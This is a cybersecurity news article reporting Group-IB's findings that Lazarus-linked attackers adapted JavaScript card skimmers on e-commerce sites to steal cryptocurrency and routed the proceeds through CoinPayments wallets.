Lazarus E-Commerce Attackers Adapt Web Skimming for Stealing Cryptocurrency

 

Cybercriminals with apparent ties to North Korea that hit e-commerce shops in 2019 and 2020 to steal payment card data also tested functionality for stealing cryptocurrency, according to the cybersecurity firm Group-IB. 

Group-IB's latest report builds on findings revealed in July 2020 by Dutch security firm Sansec, which reported that malicious infrastructure and, in many cases, the malware was being used for Magecart-style attack campaigns that had previously been attributed to the Lazarus Group. 

Lazarus - aka Hidden Cobra, Dark Seoul, Guardians of Peace, APT38, Bluenoroff, and a host of other names - refers to a group of hackers with apparent ties to the Pyongyang-based government officially known as the Democratic People's Republic of Korea, led by Kim Jong-Un.

Magecart-style attacks refer to using so-called digital card skimming or scraping tools - aka JavaScript sniffers - that they inject into victim organizations' e-commerce sites. Victims of such attacks have included jewelry and accessories retailer Claire's and Ticketmaster UK, among thousands of others. 

Researchers at Group-IB stated that after reviewing the attack campaign discovered by Sansec, it also found signs suggesting that attackers had been experimenting not just with stealing payment card data but also cryptocurrency.

Group-IB reports that it found the same infrastructure being used, together with a modified version of the same JavaScript sniffer - aka JS-sniffer - that Sansec described in its report. Group-IB has dubbed the cryptocurrency-targeting campaign Lazarus BTC Changer. 

The attackers appear to have stolen relatively little cryptocurrency via the sites' customers: just $9,000 worth of Ethereum and $8,400 worth of bitcoins, Group-IB reports. Group-IB says those stolen funds appeared to have been routed to bitcoin cryptocurrency wallets allegedly owned by CoinPayments.net, "a payment gateway that allows users to conduct transactions involving bitcoin, Ethereum, Litecoin, and other cryptocurrencies." 

Lazarus may have used the site to launder the stolen funds by moving them to other cryptocurrency exchanges or wallets. The cybersecurity firm notes that CoinPayment's "know your customer" policy could help identify the individuals who initiated the transactions. The service's user agreement stipulates that individuals attest that they are not operating in or on behalf of anyone in a prohibited jurisdiction, which includes North Korea.